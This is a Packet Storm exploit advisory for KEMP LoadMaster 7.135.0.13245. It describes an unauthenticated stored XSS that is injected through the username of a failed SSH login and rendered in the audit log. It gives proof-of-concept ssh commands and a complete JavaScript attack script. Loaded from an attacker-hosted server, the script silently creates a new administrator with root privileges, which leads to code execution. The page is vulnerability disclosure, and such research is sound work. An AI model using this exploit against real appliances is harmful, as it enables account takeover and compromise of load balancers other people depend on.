exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

KEMP LoadMaster 7.135.0.13245 XSS / Code Execution

KEMP LoadMaster 7.135.0.13245 XSS / Code Execution
Posted May 31, 2017
Site securiteam.com

KEMP LoadMaster version 7.135.0.13245 suffers from persistent cross site scripting and remote code execution vulnerabilities.

tags | exploit, remote, vulnerability, code execution, xss
SHA-256 | 40a63bf9cbf46ca01a18785c8a019b65341c0efbcd81542b5279e2a98b25ce9c

KEMP LoadMaster 7.135.0.13245 XSS / Code Execution

Change Mirror Download
Vulnerability Summary

KEMPas main product, the LoadMaster, is a load balancer built on its own proprietary software platform called LMOS, that enables it to run on almost any platform: As a KEMP LoadMaster appliance, a Virtual LoadMaster (VLM) deployed on HyperAV, VMWare, on bare metal or in the public cloud. KEMP is available in Azure, where it is in the top 15 deployed applications as well as in AWS and VMWare vCloud Air.

A cross site scripting web vulnerability has been discovered in KEMP LoadMaster v7.135.0.13245 (latest). A non authenticated user is able to inject his own malicious Javascript code into the system and use it to create a new web administrator user.

Vendor response

We were unable to get an update beyond this statement from the vendor: Expect a fix in our new version available Jan 2017.

Vulnerability Details

The issue is located in the System Configuration > System Log Files a View Audit LogFile section.
Once administrative access is obtained, the attacker can use it to execute arbitrary code.

Proof of Concept (PoC):

1 a Verify, in the victim machine the Audit LogFile (System Configuration > System Log Files): it is empty (Image 2)

2 a Inject simple HTML/JS code in the log page, using the ssh client: from an attacker machine open a shell and type the following code:

ssh \<button\ onclick\=alert\(1\)\>Click\ <\/button\>@10.0.8.145

3 a Let the login fail using wrong password (Image 4)

4 a Check again the log page (View Audit LogFile): as you can see the HTML/JS code has been correctly injected (Image 5)

Attack script:

1 a Start a web server and host on attack machine the following JS file (kemp_attack.js)

//BEGIN//////////////////////////////////////////////////////// openl = function(verb, url, data, target) {
var form = document.createElement("form"); form.action = url;
form.method = verb;
form.target = target || "_self";
if (data) {
for (var key in data) {
var input = document.createElement("textarea"); input.name = key;
input.value = typeof data[key] === "object" ?
JSON.stringify(data[key]) : data[key]; form.appendChild(input);
} }
form.style.display = 'none'; document.body.appendChild(form); form.submit();
};
//modify the target IP (10.0.8.145) and user/pass as necessary
openl('POST', 'https://10.0.8.145/progs/useradmin/add', {user:'Peru',pass:'GoSecure!',s:'Add+User'}, 'newWindow'); //modify the target IP as necessary, xuser must be equal to user. Increase the timeout (250) for debug setTimeout(function(){openl('POST', 'https://10.0.8.145/progs/useradmin/setopts', {xuser:'Peru',root:'1'}, 'newWindow');}, 250);
//modify the target IP as necessary. The timeout must be greater than the previous
setTimeout(function(){openl('', 'https://10.0.8.145/', '', 'newWindow');}, 500); //////////////////////////////////////////////////////////END//

2 a Verify permission of kemp_attack.js (chmod 644 kemp_attack.js)

3 a Verify users currently enabled in Kemp LoadMaster from System Configuration > User Management. As you can se no user (a part from default one) is active in the appliance (Image 8)

4 a Inject the attack code: from the attacker machine open a shell and type the following code:

ssh \<script \ src\=\"http\&\#x3A\;\/\/10\.0\.8\.130\/kemp\_attack\.js\"\>\ </script>@10.0.8.145

5 a Check again the log page (View Audit LogFile): this will activate the script

6 a Check again the User Management page: a new user as been created with all permissions.

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close